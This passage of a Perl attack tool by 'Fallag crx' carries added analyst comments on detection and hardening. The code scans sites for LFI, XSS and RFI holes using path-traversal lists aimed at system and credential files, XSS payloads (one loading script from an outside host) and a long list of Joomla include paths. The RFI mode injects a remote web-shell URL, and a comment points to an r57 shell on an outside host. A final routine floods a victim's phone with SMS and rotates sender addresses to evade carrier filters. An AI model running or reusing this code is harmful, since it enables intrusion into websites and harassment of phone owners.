/conf/httpd.conf","../../etc/httpd/conf/httpd.conf","../../../etc/httpd/conf/httpd.conf","../../../../etc/httpd/conf/httpd.conf","../../../../../etc/httpd/conf/httpd.conf","../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","//etc/httpd/conf/httpd.conf","..//..//etc/httpd/conf/httpd.conf","..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf"
  509. ,"../etc/resolv.conf","../../etc/resolv.conf","../../../etc/resolv.conf","../../../../etc/resolv.conf","../../../../../../etc/resolv.conf","../../../../../../../../etc/resolv.conf","../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../../../../..etc/resolv.conf","..//etc/resolv.conf","..//..//etc/resolv.conf","..//..//..//etc/resolv.conf","..//..//..//..//etc/resolv.conf","../..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/resolv.conf","/etc/motd","../etc/motd","../../etc/motd","../../../etc/motd","../../../../etc/motd","../../../../../etc/motd","../../../../../../etc/motd","../../../../../../../etc/motd","../../../../../../../../etc/motd","//etc/motd","..//..//etc/motd","..//..//..//etc/motd","..//..//..//..//..//etc/motd","..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","/etc/crontab","../etc/crontab","../../etc/crontab","../../../etc/crontab","../../../../etc/crontab","../../../../../etc/crontab","../../../../../../etc/crontab","../../../../../../../etc/crontab","../../../../../../../../etc/crontab","../../../../../../../../../etc/crontab","//etc/crontab","..//etc/crontab","..//..//etc/crontab","..//..//..//etc/crontab","..//..//..//..//etc/cr
ontab","..//..//..//..//..//etc/crontab","..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//..//..//etc/crontab","/etc/ssh/sshd_config","../etc/ssh/sshd_config","../../etc/ssh/sshd_config","../../../etc/ssh/sshd_config","../../../../etc/ssh/sshd_config","../../../../../etc/ssh/sshd_config","../../../../../../etc/ssh/sshd_config","../../../../../../../etc/ssh/sshd_config","../../../../../../../../etc/ssh/sshd_config","../../../../../../../../../etc/ssh/sshd_config","//etc/ssh/sshd_config","..//etc/ssh/sshd_config","..//..//etc/ssh/sshd_config","..//..//..//etc/ssh/sshd_config","..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config"
  510. );
  511. ######
  # @XSS: fixed list of 13 reflected-XSS probe strings (one entry appears twice).
  # The code that sends them is outside this part of the paste; presumably each
  # string is placed into a request parameter by the "Lfi Rfi Xss Scanner" menu
  # option and the response is searched for it -- TODO confirm against that code.
  # Assigned without `my`, so this is a package global. The literals are
  # double-quoted but contain no `$` or `@`, so Perl interpolates nothing.
  #
  # Defender notes: every probe carries the constant marker "crx" (or
  # "Fallag crx"), so these exact strings in query strings, POST bodies or
  # Referer headers are a usable log/WAF signature for this tool. A page that
  # encodes output for the context it is written into (HTML body, attribute,
  # URL) returns all of them inert.
  #
  # First entry: plain-text marker with no markup.
  512. @XSS = ("Fallag crx",
  # Harmless formatting tags: reveal whether raw HTML is echoed unencoded.
  513. "<center>crx</center>",
  514. "<center><marquee>crx</marquee> </center>",
  # Mixed-case tag name: same probe against a case-sensitive tag filter.
  515. "<CeNTer>crx</CeNTer>",
  # Closes a quoted attribute value first, then a script element reading document.cookie.
  516. "='><script>alert(document.cookie)</script>",
  # Already HTML-entity encoded (the final "&gt" has no semicolon in the source);
  # only meaningful if the application decodes entities before output.
  517. "&lt;script&gt;alert('crx');&lt;/script&gt",
  518. "a?<script>alert('crx')</script>",
  519. "<SCRIPT>a=/crx/alert(a.source)</SCRIPT>",
  # Percent-encoded angle brackets: relies on the server URL-decoding the value.
  520. "%3Cscript%3Ealert('crx')%3C/script%3E",
  # javascript: URI in an image source, with and without quote characters.
  521. "<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>",
  522. "<IMG SRC=javascript:alert('crx')>",
  # Exact duplicate of the entry on paste line 519.
  523. "<SCRIPT>a=/crx/alert(a.source)</SCRIPT>",
  # Script element whose source is a third-party host: if reflected unencoded, the
  # browser would fetch script from that host. Treat the hostname in this literal
  # as an indicator in proxy logs and CSP violation reports; a script-src allowlist
  # blocks the load.
  524. "<SCRIPT SRC=http://MrTieDie-blackhat.persiangig.com/XSS.JS?<B>");
  525.  
  526. ######
  527. @RFI = ("/components/com_flyspray/startdown.php?file=",
  528. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
  529. "/components/com_simpleboard/file_upload.php?sbp=",
  530. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
  531. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
  532. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
  533. "/components/com_performs/performs.php?mosConfig_absolute_path=",
  534. "/components/com_forum/download.php?phpbb_root_path=",
  535. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
  536. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
  537. "/components/minibb/index.php?absolute_path=",
  538. "/components/com_smf/smf.php?mosConfig_absolute_path=",
  539. "/modules/mod_calendar.php?absolute_path=",
  540. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
  541. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
  542. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
  543. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
  544. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
  545. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
  546. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
  547. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
  548. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
  549. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
  550. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
  551. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  552. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
  553. "/akocomments.php?mosConfig_absolute_path=",
  554. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
  555. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  556. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
  557. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
  558. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
  559. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
  560. "/components/com_fm/fm.install.php?lm_absolute_path=",
  561. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
  562. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
  563. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
  564. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
  565. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
  566. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
  567. "/components/com_mambowiki/MamboLogin.php?IP=",
  568. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
  569. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
  570. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
  571. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
  572. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
  573. "/components/com_mospray/scripts/admin.php?basedir=",
  574. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
  575. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
  576. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
  577. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
  578. "/components/com_madeira/img.php?url=",
  579. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  580. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  581. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  582. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  583. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
  584. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
  585. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
  586. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
  587. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
  588. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
  589. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
  590. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
  591. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
  592. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
  593. "/index.php?option=com_custompages&cpage=",
  594. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
  595. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  596. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
  597. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
  598. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
  599. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
  600. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
  601. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
  602. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
  603. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
  604. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
  605. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
  606. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
  607. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
  608. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
  609. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
  610. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
  611. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
  612. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
  613. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
  614. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
  615. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
  616. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
  617. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
  618. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
  619. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
  620. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  621. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
  622. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  623. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
  624. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  625. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  626. "/components/com_joomlaboard/file_upload.php?sbp=",
  627. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
  628. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
  629. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
  630. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
  631. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
  632. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
  633. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
  634. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
  635. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
  636. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
  637. "/modules/mod_as_category.php?mosConfig_absolute_path=",
  638. "/components/com_articles.php?absolute_path=",
  639. "/classes/html/com_articles.php?absolute_path=",
  640. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
  641. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
  642. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
  643. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
  644. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
  645. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
  646. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
  647. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
  648. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
  649. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
  650. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
  651. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
  652. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
  653. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
  654. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
  655. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
  656. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
  657. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
  658. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
  659. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
  660. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
  661. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
  662. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
  663. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
  664. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
  665. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  666. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  667. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
  668. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
  669. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
  670. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
  671. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
  672. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
  673. "/com_magazine_3_0_1/magazine.functions.php?config=",
  674. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  675. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
  676. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
  677.  
  678.  
  679. ##############################
  680. #XSS
  681.  
  # Analyst note: menu branch $ID==1. Reads a base URL from STDIN, appends each
  # entry of @XSS (defined outside this excerpt) and fetches it with get()
  # (LWP::Simple is imported at the top of the file). Every probe and its
  # verdict is appended to XSS.txt in the working directory.
  # The verdict condition is applied to $URL and to $_, not to the body held
  # in $Source, so a "FOUND" line in XSS.txt does not show that the site
  # reflected anything. On the server side this appears as a burst of GETs
  # that differ only in the value of one query parameter.
  682. if ($ID==1){
  683.  
  684. print "\n XSS:";
  685. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
  686. print "\n\t\t Target:";
  687. $Target=<STDIN>;
  688. chomp ($Target);
  689.  
  690. foreach $XSS(@XSS){
  691. my $URL = $Target.$XSS;
  692. my $Source = get $URL;
  693. die "Can not get $URL" unless defined $URL;
  694. if ( $URL =~ /Fallaga/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="XSS Vulnerability FOUND";}
  695. else { $Message = "NOT FOUND XSS Vulnerability";}
  696. print "$URL     =>    $Message\n";
  697. print "\n \n \n \n \t \t \t \t FINISH ";
  # Bareword handle, two-argument open, return value not checked.
  698. open (TEXT, '>>XSS.txt');
  699. print TEXT "\n$URL   =>   $Message \n\n";
  700. close (TEXT);
  701. }
  # Jumps to the Exit: label, which sits inside the LFI loop of the $ID==4 branch.
  702. goto Exit;
  703. }
  704. ###############################
  705. #LFI
  # Analyst note: menu branch $ID==2. Same flow as the XSS branch, using the
  # @LFI list (defined outside this excerpt) and appending to LFI.txt.
  # Only /root/i is bound to the response in $Source; the remaining patterns
  # are matched against $_. The marker words (root, usr, dev, var, bin) also
  # occur in ordinary pages, so the verdicts are noisy either way.
  # Hardening for the bug class being probed: resolve include/file targets
  # against a fixed allowlist instead of taking a path from the request.
  706. if ($ID==2){
  707.  
  708. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
  709. print "\n\t\t Target:";
  710. $Target=<STDIN>;
  711. chomp ($Target);
  712.  
  713.  
  714. foreach $LFI(@LFI){
  715. my $URL = $Target.$LFI;
  716. my $Source = get $URL;
  717. die "Can not get $URL" unless defined $URL;
  718. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  719. else { $Message = "NOT FOUND LFI Vulnerability";}
  720. print "$URL     =>    $Message\n";
  721. print "\n \n \n \n \t \t \t \t FINISH ";
  722. open (TEXT, '>>LFI.txt');
  723. print TEXT "\n$URL   =>   $Message \n\n";
  724. close (TEXT);
  725. }
  726.  
  727. }
  728. #################################
  # Analyst note: menu branch $ID==3. Each request is $Target + one @RFI entry
  # + an operator-supplied remote URL ($Shell). @RFI is presumably the path
  # list that ends just above the "#XSS" marker (its declaration is outside
  # this excerpt - confirm); those entries end in an empty include-path
  # parameter such as mosConfig_absolute_path=, mosConfig_live_site= or
  # GLOBALS[mosConfig_absolute_path]=, so the remote URL becomes its value.
  # Detection: a request in which one of those parameters carries an http://
  # or https:// value. Hardening: keep PHP allow_url_include off, do not run
  # with register_globals, and retire the legacy components named in the list.
  # Of the four markers tested below only /r57shell/ is bound to $Source; the
  # others are matched against $_. Results are appended to RFI.txt.
  729. if ($ID==3){
  730.  
  731. print "\t\tPlease Enter Target [http://www.site.com]";
  732. print "\n\n \t Target:";
  733. $Target=<STDIN>;
  734. chomp ($Target);
  735. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
  736. $Shell =<STDIN>;
  737. chomp ($Shell);
  738. print"\n\n \t\t Please wait";
  739. sleep(2);
  740. print"\n";
  741.  
  742. foreach $RFI(@RFI){
  743. my $URL =$Target.$RFI.$Shell;
  744. my $Source = get $URL;
  745. die "Can not get $URL" unless defined $URL;
  746. if ($Source =~ /r57shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
  747. else { $Message = "NOT FOUND RFI Vulnerability";}
  748. print "\n \n \n \n \t \t \t \t FINISH ";
  749. print "\n $URL  =>   $Message \n";
  750. open (TEXT, '>>RFI.txt');
  751. print TEXT "\n $URL   =>   $Message \n\n";
  752. close (TEXT);
  753.  
  754. }
  755.  
  756. }
  757. #################################
  758. #XSS & LFI
  # Analyst note: menu branch $ID==4. Runs the @XSS loop and then the @LFI
  # loop against one target, appending both sets of verdicts to ALL.txt.
  # $Shell is read from STDIN but is not used by either loop in this branch.
  # The verdict conditions have the same shape as in the single-mode branches:
  # the XSS test looks at $URL and $_, and only the first LFI pattern is bound
  # to $Source.
  759. if ($ID==4){
  760.  
  761. print "\t\tPlease Enter Target [http://www.site.com]";
  762. print "\n\n \t Target:";
  763. $Target=<STDIN>;
  764. chomp ($Target);
  765. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
  766. $Shell =<STDIN>;
  767. chomp ($Shell);
  768. print"\n\n \t\t Please wait";
  769. sleep(2);
  770. print"\n";
  771.  
  772.  
  773. foreach $XSS(@XSS){
  774. my $URL = $Target.$XSS;
  775. my $Source = get $URL;
  776. die "Can not get $URL" unless defined $URL;
  777. if ( $URL =~ /Fallaga/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="Vulnaravel a XSS";}
  778. else { $Message = "NOT FOUND XSS Vulnerability";}
  779. print "$URL     =>    $Message\n";
  780. print "\n \n \n \n \t \t \t \t FINISH ";
  781. open (TEXT, '>>ALL.txt');
  782. print TEXT "\n$URL   =>   $Message \n\n";
  783. close (TEXT);
  784. }
  785.  
  786. foreach $LFI(@LFI){
  787. my $URL = $Target.$LFI;
  788. my $Source = get $URL;
  789. die "Can not get $URL" unless defined $URL;
  790. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  791. else { $Message = "NOT FOUND LFI Vulnerability";}
  792. print "$URL     =>    $Message\n";
  793. print "\n \n \n \n \t \t \t \t FINISH ";
  794. open (TEXT, '>>ALL.txt');
  795. print TEXT "\n$URL   =>   $Message \n\n";
  796. close (TEXT);
  797. if ($ID==5) {exit;}
  # Exit: is the target of "goto Exit" in the $ID==1 branch. The exit that
  # follows is unconditional, so system("pause") after it is never reached.
  798. Exit:
  799. exit;
  800. system("pause");
  801. }
  # The first brace below closes the $ID==4 branch; the remaining ones close
  # blocks opened earlier in the file, outside this excerpt.
  802. }}
  803. }
  # Analyst note: menu option '6'. The window title says "Joomla Component
  # Scanner", but the code in this branch is the SMS flooding routine
  # announced by the banner below. It collects a destination number, a
  # carrier id, a message count, a sender address, a subject and a body from
  # STDIN, then calls main(), which submits them repeatedly to a public
  # web-to-SMS form (see bomb()).
  # Defensive relevance: controls sit with the gateway and the carrier -
  # per-destination rate limits, an interactive challenge on the form, and
  # limits that do not depend on the exact sender address.
  # The use/package lines take effect at compile time, whichever menu option
  # was chosen.
  804. if($targett eq '6')
  805. {
  806. system('cls');
  807. system('title Joomla Component Scanner');
  808. package control;
  809. use LWP::UserAgent;
  810. use LWP::Simple;
  811. use strict;
  812. use warnings;
  813. use threads;
  814. use threads::shared;
  815. use Config;
  816. use HTML::TreeBuilder;
  817. use HTML::Element;
  818.  
  819.  
  820.  
  821. $Config{useithreads} or die('Recompile Perl with threads to run this program.'); #thread(enabled) check
  822.  
  823.  
  824. print"**********************************************************\n";
  825. print"*************************SMS BoMbEr***********************\n";
  826. print"************************By: Fallag crx**********************\n";
  827. print"**********************************************************\n";
  828.  
  829. ##getting inputs, need to get rid of whitespace and or \n character with chomp();
  830. print"Enter the number you want to bomb: \n";
  831. chomp(my $phoneNum = <STDIN>);
  832.  
  833. print "Enter your carrier (AT&T=41|Verizon=203|Sprint=176): \n";
  834. chomp(my $carrier = <STDIN>);
  835.  
  836. print "How many messages?: \n";
  837. chomp(my $amountOfMessages = <STDIN>);
  838.  
  839. print "Enter your email: \n";
  840. chomp(my $from = <STDIN>);
  841.  
  842. print "Enter your subject: \n";
  843. chomp(my $subject = <STDIN>);
  844.  
  845. print "Enter your SMS MSG: \n";
  846. chomp(my $message = <STDIN>);
  847.  
  848. print "**********************************************************\n";
  849. print "**BOMBING\n";
  # Counters declared with the threads::shared ":shared" attribute.
  850. my $numOfBombsSent :shared = 0;
  851. my $inc :shared = 0;
  852. $inc = 10000; #incrementing variable used for carriers that sort messages by email instead of phone #
  853. &main;
  854.  
  # main: send loop. Repeats while $numOfBombsSent is below $amountOfMessages.
  # When exactly one message remains it calls bomb() directly; otherwise it
  # forks, and parent and child each call checkAndBypassEmailFilter() and
  # bomb() once, with the parent then waiting on the child via waitpid().
  # Takes no arguments; works on the file-level lexicals declared above it.
  855. sub main{
  856.         while($numOfBombsSent<$amountOfMessages){
  857.                 &checkAndBypassEmailFilter;
  858.                 if(($amountOfMessages-$numOfBombsSent)==1){
  859.                         &checkAndBypassEmailFilter;
  860.                         &bomb;
  861.                 } else {
  862.                         my $pid = fork();   #fork splits process into two
  863.                         if($pid){      #immediately have to handle both ($pid,0) <-child and ($pid) <- parent **parent
  864.                                 if($numOfBombsSent<$amountOfMessages){
  865.                                         &checkAndBypassEmailFilter;                             #has to make sure that child is done executing before it finishes. or else child will
  866.                                         &bomb; #parent                                                  #become a zombie
  867.                                 }
  868.                                 waitpid($pid, 0);
  869.                         } elsif($pid == 0){
  870.                                 if($numOfBombsSent<$amountOfMessages){
  871.                                         &checkAndBypassEmailFilter;
  872.                                         &bomb; #child
  873.                                 }
  874.                         } else {
  875.                                 die "Fork failed";
  876.                         }
  877.                 }
  878.         }
  879. }
  880.  
  # checkAndBypassEmailFilter: for carrier ids 203 and 176 only, rewrites the
  # sender address $from by splitting it at '@' and appending the current
  # value of $inc (then incremented) to the local part.
  # Defensive relevance: this is sender-address rotation, so a filter or rate
  # limit keyed on the exact sender string sees a new sender each time. Key
  # limits on the destination number instead (or on a normalised sender).
  881. sub checkAndBypassEmailFilter{
  882.         if($carrier==203 or $carrier==176){ #this is for some carriers that organize based on the email function (thus not getting the full bomb effect)
  883.                                                                                 #so this increments their email by one each time to start a new convo :D gotcha bitch
  884.                 my @email = split('@', $from);
  885.                 lock($inc);                                             #locks $inc variable so nothing else can modify it until it's done with it.
  886.                 $from = $email[0].$inc++.'@'.$email[1];
  887.         }
  888. }
  # postUrl($url, $formref): POSTs the form fields in $formref to $url with a
  # 300-second timeout and returns the response body, or the literal string
  # "POST failure" when the response is not a success.
  # Detection: the request carries the User-Agent "perlproc/1.0".
  # $content receives the result of the list assignment on the next line
  # evaluated in scalar context and is not used afterwards.
  889. sub postUrl {
  890.         my $content =
  891.         my($url, $formref) = @_;
  892.         my $ua = new LWP::UserAgent(timeout => 300); # set up a UserAgent object to handle request
  893.         $ua->agent('perlproc/1.0');
  894.         my $response = $ua->post($url, $formref);  #no need to handle the response from server.
  895.         if($response->is_success){
  896.                 return $response->content;
  897.         } else {
  898.                 return "POST failure";
  899.         }
  900. }
  # Return_Code($html): parses the page with HTML::TreeBuilder and returns the
  # 'value' attribute of the first INPUT element whose NAME attribute is
  # "code". There is no explicit return when no such element exists.
  # NOTE(review): the field is presumably a per-page form token - confirm. A
  # token that any unauthenticated GET of the index page hands out does not
  # by itself stop scripted submission; it needs to be tied to a session or
  # an interactive challenge.
